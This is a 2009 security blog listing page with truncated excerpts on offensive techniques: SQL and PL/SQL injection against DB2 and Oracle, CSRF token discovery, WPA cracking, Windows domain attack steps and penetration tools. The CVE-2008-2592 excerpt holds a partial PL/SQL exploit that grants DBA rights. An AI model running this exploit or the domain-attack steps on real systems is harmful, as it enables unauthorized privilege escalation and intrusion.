Skills and tools

DB2 SQL Injection Cheat Sheet

Posted in Skills and tools, skills on November 2nd, 2009 by admin – 1 Comment

Finding a SQL injection vulnerability in a web application backed by DB2 isn’t too common in my experience. When you do find one, though, it pays to be prepared…

Below are some tabulated notes on how to do many of the things you’d normally do via SQL injection. All tests were performed on DB2 8.2 under Windows.

This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endeavoured to tabulate the data to make it easier to read and to

Oracle Database versions 9G and 10G are susceptible to a PL/SQL injection vulnerability

Posted in Skills and tools, skills on October 31st, 2009 by admin – Be the first to comment

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-010
http://dsecrg.com/pages/vul/show.php?id=110

Application: Oracle Database 10G
Versions Affected: Oracle 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4
Vendor URL: http://oracle.com
Bugs: PL/SQL Injections
Exploits: YES
Reported: 29.01.2008
Vendor response:

Hacking CSRF Tokens using CSS History Hack

Posted in Skills and tools, skills on October 31st, 2009 by admin – Be the first to comment

Until now, it was considered infeasible for an attacker to discover your CSRF token using brute force attacks on the server. I am going to change this belief by showing you a technique to quickly find CSRF tokens without generating alerts.

Credit:
The information has been provided by Inferno at SecureThoughts.com and Jeremiah Grossman.

I was thinking about the problem of Cross Site Request Forgery and current mitigation strategies used in the Industry. In many of the real

Crack WPA in just 1 minute

Posted in Skills and tools, skills on October 31st, 2009 by admin – Be the first to comment

If it is not available, please tell me.

Researchers Toshihiro Ohigashi of Hiroshima University and Masakatu Morii of Kobe University were able to crack WPA in just 1 minute, using a technique called a practical message falsification attack.

http://jwis2009.nsysu.edu.tw/location/paper/A%20Practical%20Message%20Falsification%20Attack%20on%20WPA.pdf

Windows Domain Attack

Posted in Skills and tools, skills on October 29th, 2009 by admin – 3 Comments

Get administrator rights on a workstation which is on a Windows domain using whatever method you can find (exploit, stolen password, smbrelay, phishing, etc.). Look for the domain server. There are a variety of ways to do this. You can use arp -a to find active IPs, or ping-scan the network and then use the nbtstat tool to look for the right domain controller identifier or an obvious hostname.

You can also browse the network neighborhood or use the net view command.

Acquiring and

DBMS_DEFER_SYS; CVE-2008-2592

Posted in Skills and tools, skills on October 24th, 2009 by admin – Be the first to comment

The exploit for this vulnerability is in Metasploit, but I could not find it on milw0rm or at any other exploit repository. This was patched in CPU July 2008.

So, if you need to use it outside metasploit, here it is:

DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);

Bsqlbf v2.4

Posted in Skills and tools, skills, tools on October 24th, 2009 by admin – Be the first to comment

This is an updated version of bsqlbf. This now has the VALIDATE_REMOTE_RC() exploit which David Litchfield discussed in his paper

6: Type 6 is O.S code execution [ORACLE DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit]

This vulnerability was patched by Oracle in the July 2009 Critical Patch Update. In a nutshell, if you have identified a SQL injection as the ‘SYS’ user then

More on injecting PL/SQL from SQL Injections

Posted in Skills and tools, tools on October 24th, 2009 by admin – Be the first to comment

David Litchfield yesterday released 3 papers describing security issues which have now been addressed by Oracle.
Out of these, I found this one particularly interesting.

In a nutshell, this paper talks about 2 functions which allow execution of PL/SQL; an attacker can use these to inject PL/SQL even if he has found just a SQL injection. This could also be used to get around the CREATE FUNCTION privilege. This is very similar to the DBMS_EXPORT_EXTENSION vulnerability which David

Fly_flash 0.1 release

Posted in Skills and tools, skills, tools on August 29th, 2009 by admin – Be the first to comment

fly_flash — Jump/XSS/CSRF in Flash

Author: lake2@80sec.com
Site: http://www.80sec.com
Date: 2009-8-26
From: http://www.80sec.com/release/fly_flash.txt
80SEC — know it then hack it !

[ description ]

fly_flash is a tool for penetration testing in Flash

[ usage ]

upload fly_flash.swf and fly_flash.txt to your server in the same directory, embed fly_flash.swf in another website, and modify fly_flash.txt first: ,[,,,data]

cmd

LastBit PowerPoint Password Recovery 12.0.9123

Posted in Skills and tools, tools on August 23rd, 2009 by admin – Be the first to comment
File size: 0.69 MB
Platform: Win95,Win98,WinME,WinNT 4.x,WinXP,Windows2000
License: Demo
Price:  
Date added: 2009-05-15